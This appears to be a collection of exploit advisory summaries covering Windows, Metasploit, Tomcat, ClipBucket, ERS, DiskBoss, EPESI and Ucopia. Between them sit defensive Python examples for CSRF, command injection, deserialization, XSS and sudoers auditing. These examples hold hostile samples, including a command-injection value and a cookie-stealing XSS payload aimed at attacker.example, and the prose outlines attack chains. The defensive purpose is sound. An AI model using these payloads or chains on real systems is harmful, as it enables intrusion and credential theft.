Exploits for the recently patched win32kfull!bFill vulnerability. Running either the Palette or the Bitmap exploit gives you SYSTEM privileges on the affected system. The exploits should work on Windows 10 x64 with the Creators Update, build 15063.540 (the last Windows 10 build released before Microsoft's September updates). The Visual Studio solution contains three exploits: CVE-2016-3309_Reloaded_Bitmaps, CVE-2016-3309_Reloaded_Palettes and CVE-2016-3309_Reloaded_Deadlock.
Metasploit Pro, Express, Ultimate, and Community are affected by a cross-site request forgery (CSRF or XSRF, also known as a one-click attack) issue, a type of malicious exploit of a website in which unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack exploits the trust that a specific website has in a user's browser. The MSF did not protect the logout form with a CSRF token, therefore I can log out any user by sending this URL: https://Metasploit-Server-IP:3790/logout. It's less damaging than a traditional 'hack back' but is sure to irritate the local red team to no end. It's essentially a user DoS.
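The root cause above is a state-changing endpoint that accepts any cookie-bearing request. The following is an added illustration, not Metasploit code: a toy logout handler in the unprotected form beside one that requires a POST carrying a session-bound token, with a simulated cross-site GET against each. The session store, session id and parameter names are hypothetical.

```python
import hashlib
import hmac
import secrets

# Server-side key. Generated fresh here for the demonstration; a real deployment keeps it in persistent config.
SECRET_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session; the server embeds it in the logout form as a hidden field."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def logout_vulnerable(sessions: dict, session_id: str, method: str, params: dict) -> bool:
    """Pattern the advisory describes: any request carrying the session cookie ends the session,
    so a third-party page that makes the victim's browser fetch /logout succeeds."""
    return sessions.pop(session_id, None) is not None


def logout_hardened(sessions: dict, session_id: str, method: str, params: dict) -> bool:
    """Require a POST that carries a token matching this session; anything else is ignored."""
    if method != "POST":
        return False
    supplied = str(params.get("csrf_token", "")).encode()
    expected = issue_csrf_token(session_id).encode()
    if not hmac.compare_digest(supplied, expected):  # constant-time comparison
        return False
    return sessions.pop(session_id, None) is not None


def session_survives_cross_site_request(handler) -> bool:
    """Victim is logged in; an attacker page triggers a cookie-bearing GET /logout with no token
    (the browser attaches the cookie automatically, but the attacker cannot read the token)."""
    sessions = {"sess-victim": {"user": "operator"}}  # constructed session store
    handler(sessions, "sess-victim", "GET", {})
    return "sess-victim" in sessions
```

Binding the token to the session (rather than storing a random value per form) keeps the check stateless; a SameSite=Lax or Strict cookie attribute is a complementary defence, not a replacement for the token on a logout endpoint that some browsers will still reach via top-level navigation.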
$_GET['uploaddir'] is not escaped before being passed to system() through $tmp_upload_dir, so shell metacharacters in the parameter are interpreted by the shell.
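To show why an unescaped parameter reaching system() is a command injection, here is an added example (not the application's code) that reproduces the pattern in Python: the raw value is interpolated into a shell command in the vulnerable form, and quoted with shlex.quote (the equivalent of PHP's escapeshellarg()) in the hardened form. The page does not say which command the directory is passed to; the mkdir -p below is an assumption for illustration, and the payload value is constructed.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Assumed shape of the vulnerable PHP: system("mkdir -p " . $tmp_upload_dir) with $tmp_upload_dir = $_GET['uploaddir'].
PAYLOAD = "uploads; echo INJECTED"  # constructed attacker value for the uploaddir parameter


def build_command_vulnerable(uploaddir: str) -> str:
    """Interpolate the raw parameter into the shell string: ';' ends mkdir and starts the attacker's command."""
    return "mkdir -p " + uploaddir


def build_command_hardened(uploaddir: str) -> str:
    """Quote the parameter so the shell sees one argument (PHP: escapeshellarg())."""
    return "mkdir -p " + shlex.quote(uploaddir)


def is_safe_dirname(name: str) -> bool:
    """Stricter alternative: allow only a plain directory name, rejecting separators and metacharacters outright."""
    return re.fullmatch(r"[A-Za-z0-9_-]{1,64}", name) is not None


def run_in_scratch_dir(command: str) -> dict:
    """Run the command through the shell (as PHP system() does) inside a throwaway directory
    and report what was printed and which entries were created."""
    with tempfile.TemporaryDirectory() as scratch:
        proc = subprocess.run(command, shell=True, cwd=scratch, capture_output=True, text=True)
        return {"stdout": proc.stdout, "created": sorted(os.listdir(scratch))}
```

With the vulnerable builder the payload creates "uploads" and then runs echo; with the quoted builder the whole value becomes a single oddly named directory and nothing else executes. The allowlist check is the better fix where the value is only ever meant to be a directory name.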
The following PoC bypasses the fix for issue 1263. It defines a function f() that creates an object o, iterates over the keys of {xx: 0}, and prints the value of o[i] for each key i.
ClipBucket is vulnerable to remote code execution (RCE) due to improper validation of user-supplied input. An attacker can exploit this by sending a maliciously crafted request to the vulnerable server, which allows the attacker to execute arbitrary code on it.
Apache Tomcat 7.0.0 through 7.0.79 is susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method; this is a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have the PUT method enabled by using a specially crafted HTTP request.
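The precondition in the last sentence is the DefaultServlet's readonly init-param: Tomcat refuses PUT and DELETE unless it has been set to false. The following added check (not Tomcat's code) parses a web.xml, reports the effective setting, and rewrites it to true. The web.xml fragment is constructed for the example and is not Tomcat's shipped conf/web.xml.

```python
import xml.etree.ElementTree as ET

DEFAULT_SERVLET = "org.apache.catalina.servlets.DefaultServlet"

# Constructed web.xml: DefaultServlet declared with readonly=false, the setting that enables PUT/DELETE.
SAMPLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
      <param-name>readonly</param-name>
      <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>
"""


def _local(tag: str) -> str:
    """Strip the XML namespace so element names compare as plain strings."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def _text(elem, name) -> str:
    found = _children(elem, name)
    return found[0].text.strip() if found and found[0].text else ""


def _default_servlet(root):
    for servlet in root.iter():
        if _local(servlet.tag) == "servlet" and _text(servlet, "servlet-class") == DEFAULT_SERVLET:
            return servlet
    return None


def default_servlet_readonly(web_xml_text: str) -> bool:
    """Effective readonly value. Tomcat parses it as a boolean string; absent means true (PUT/DELETE refused)."""
    servlet = _default_servlet(ET.fromstring(web_xml_text))
    if servlet is None:
        return True
    for param in _children(servlet, "init-param"):
        if _text(param, "param-name") == "readonly":
            return _text(param, "param-value").lower() == "true"
    return True


def put_enabled(web_xml_text: str) -> bool:
    """True when the DefaultServlet will accept PUT requests."""
    return not default_servlet_readonly(web_xml_text)


def harden_default_servlet(web_xml_text: str) -> str:
    """Return the document with any explicit readonly=false flipped back to true."""
    root = ET.fromstring(web_xml_text)
    servlet = _default_servlet(root)
    if servlet is not None:
        for param in _children(servlet, "init-param"):
            if _text(param, "param-name") == "readonly":
                values = _children(param, "param-value")
                if values:
                    values[0].text = "true"
    return ET.tostring(root, encoding="unicode")
```

Run it over conf/web.xml and over each application's WEB-INF/web.xml, since an application can redeclare the default servlet with its own init-params; finding readonly=false on a 7.0.x instance in the affected range is the condition the advisory depends on.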
ERS Data System 1.8.1 allows remote attackers to execute arbitrary code via deserialization of com.branaghgroup.ecers.update.UpdateRequest objects. To exploit this, an attacker enables packet forwarding and poisons DNS responses for the www.ersdata.com domain, then runs a request handler on the attacking machine that answers every request with malicious serialized gadgets.
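What the rogue handler hands back is a Java serialization stream, so the useful defensive check is to recognise such streams on the wire and list the classes they introduce. The following is an added triage scanner, not part of ERS Data System or any exploit tool: it checks the stream magic and walks TC_CLASSDESC records to extract class names, which can then be compared against an allowlist. The sample stream is constructed here from placeholder class descriptors (zero serialVersionUIDs, no fields) and is not a real gadget chain.

```python
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # ObjectOutputStream header: STREAM_MAGIC then STREAM_VERSION 5
TC_OBJECT = 0x73
TC_CLASSDESC = 0x72
TC_ENDBLOCKDATA = 0x78
TC_NULL = 0x70
CLASS_NAME_RE = re.compile(r"[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*")


def _classdesc(name: str, serial_version_uid: int = 0) -> bytes:
    """Minimal TC_CLASSDESC: UTF name, SUID, flags=SC_SERIALIZABLE, zero fields, end of annotations, no superclass.
    Used only to build the constructed sample; the SUIDs are placeholders, not the real classes' values."""
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name.encode("ascii")
            + struct.pack(">q", serial_version_uid) + b"\x02" + b"\x00\x00"
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))


# Constructed stand-in for a handler response: an UpdateRequest followed by a java.util.HashMap.
SAMPLE_RESPONSE = (STREAM_MAGIC
                   + bytes([TC_OBJECT]) + _classdesc("com.branaghgroup.ecers.update.UpdateRequest")
                   + bytes([TC_OBJECT]) + _classdesc("java.util.HashMap"))


def is_java_serialized(data: bytes) -> bool:
    """True when the bytes start with the Java serialization header."""
    return data[:4] == STREAM_MAGIC


def class_names(data: bytes) -> list:
    """Collect every class name introduced by a TC_CLASSDESC record.
    Heuristic: back-references (TC_REFERENCE) and block data are not tracked, so treat this as triage, not decoding."""
    names = []
    i = 4 if is_java_serialized(data) else 0
    while i + 3 <= len(data):
        if data[i] == TC_CLASSDESC:
            (length,) = struct.unpack_from(">H", data, i + 1)
            raw = data[i + 3:i + 3 + length]
            if length and len(raw) == length and CLASS_NAME_RE.fullmatch(raw.decode("ascii", "replace")):
                names.append(raw.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names


def disallowed_classes(data: bytes, allowlist) -> list:
    """Class names in the stream that are not on the allowlist; anything here deserves a look before the client deserializes it."""
    return [name for name in class_names(data) if name not in allowlist]
```

On the client side the same idea is what a filtering ObjectInputStream (look-ahead deserialization) enforces: resolve the class name before instantiating anything and reject names outside the expected set. Pinning the update host's certificate would separately defeat the DNS poisoning step.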
DiskBoss Enterprise v8.4.16 is vulnerable to a local buffer overflow. An attacker can exploit it by supplying a specially crafted Share Name field to the application, which can lead to code execution.
Multiple stored XSS vulnerabilities exist in EPESI, a web-based business information manager, in the Tasks, Phonecalls, Notes, and Alerts modules. An attacker can exploit them by creating a new task, phonecall, note, or alert and entering malicious JavaScript in the title, description, or subject fields. The payload is stored in the database and executed whenever a user views the task, phonecall, note, or alert.
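The fix for a stored XSS of this kind is output encoding at render time, not filtering on input. The following added example (not EPESI code) renders a constructed record with attacker-controlled title and description fields both ways and includes a small check that flags any tag in the output the template itself did not emit, which is a convenient assertion for a regression test. The record contents and the hostname in the payload are constructed.

```python
import html
import re

# Constructed record standing in for a task/phonecall/note/alert row; values are attacker-controlled.
MALICIOUS_RECORD = {
    "title": '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    "description": 'Call back <img src=x onerror="alert(1)">',
}

TEMPLATE_TAGS = {"h2", "p"}
TAG_RE = re.compile(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)[^>]*>")


def render_vulnerable(record: dict) -> str:
    """Stored values dropped straight into the HTML: whatever was saved runs in the viewer's browser."""
    return "<h2>%s</h2><p>%s</p>" % (record["title"], record["description"])


def render_hardened(record: dict) -> str:
    """Same template, but each value is HTML-encoded for the element-content context it lands in."""
    return "<h2>%s</h2><p>%s</p>" % (html.escape(record["title"]), html.escape(record["description"]))


def foreign_tags(rendered: str) -> list:
    """Tag names present in the output that the template does not produce; non-empty means injected markup."""
    return sorted({m.group(1).lower() for m in TAG_RE.finditer(rendered)} - TEMPLATE_TAGS)


def displays_as_text(rendered: str, record: dict) -> bool:
    """The hardened output must still show the original text verbatim once the browser decodes entities."""
    stripped = re.sub(r"</?(h2|p)>", "", rendered)
    return html.unescape(stripped) == record["title"] + record["description"]
```

html.escape covers text nodes and quoted attribute values; a value placed inside a JavaScript block, a URL, or an unquoted attribute needs the encoding for that context instead, which is why template engines with automatic context-aware escaping are preferable to hand-placed calls.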
When a user connects to the Ucopia wifi guest network, every request is redirected to controller.access.network. An easier-to-use PHP backdoor can be created by sending a request to controller.access.network/autoconnect_redirector.php. Because php is in sudoers without a password, a request can be sent to controller.access.network/upload/bd.php to execute commands with sudo privileges. An SSH key can then be pushed to the server to gain root access.
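The step that turns a PHP backdoor into root here is a passwordless sudo entry for the web-serving account, which is a condition worth auditing on any appliance. The following added check (not Ucopia code) parses a sudoers file, carries NOPASSWD/PASSWD tags across comma-separated command lists the way sudo does, and reports entries that let a web user run anything as root without a password. The sudoers text is constructed for the example and is not Ucopia's actual file; alias expansion and #includedir files are not resolved.

```python
import re

TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV", "LOG_INPUT", "NOLOG_INPUT",
        "LOG_OUTPUT", "NOLOG_OUTPUT", "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW", "INTERCEPT", "NOINTERCEPT"}
WEB_USERS = {"php", "www-data", "apache", "nginx", "http", "httpd"}  # assumed set of web-serving accounts
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
SPEC_RE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")

# Constructed sudoers excerpt (not from any real appliance).
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults    env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
php     ALL=(ALL) NOPASSWD: ALL
www-data ALL=(root) NOPASSWD: /usr/sbin/service apache2 reload
backup  ALL=(root) NOPASSWD:/usr/bin/rsync, PASSWD: /bin/systemctl
"""


def parse_sudoers(text: str) -> list:
    """Return one dict per command granted: user, runas user, command, and whether a password is required."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip()  # omitted runas means root
        nopasswd = False
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            # A tag applies to this command and every following one until another tag overrides it.
            while ":" in cmd and cmd.split(":", 1)[0].strip().upper() in TAGS:
                tag, cmd = cmd.split(":", 1)
                tag, cmd = tag.strip().upper(), cmd.strip()
                if tag == "NOPASSWD":
                    nopasswd = True
                elif tag == "PASSWD":
                    nopasswd = False
            entries.append({"user": m.group("who"), "runas": runas, "command": cmd, "nopasswd": nopasswd})
    return entries


def passwordless_entries(text: str) -> list:
    """Every grant that sudo will honour without prompting for a password."""
    return [e for e in parse_sudoers(text) if e["nopasswd"]]


def web_user_root_without_password(text: str) -> list:
    """Grants that let a web-serving account run any command as root with no password:
    exactly what turns an uploaded web shell into a root shell."""
    return [e for e in passwordless_entries(text)
            if e["user"] in WEB_USERS and e["command"] == "ALL" and e["runas"] in ("ALL", "root")]
```

A narrow NOPASSWD grant such as the www-data service reload above is still worth reviewing, since many admin tools allow shell escapes, but it is the "ALL" grant for the interpreter's own account that collapses the privilege boundary entirely.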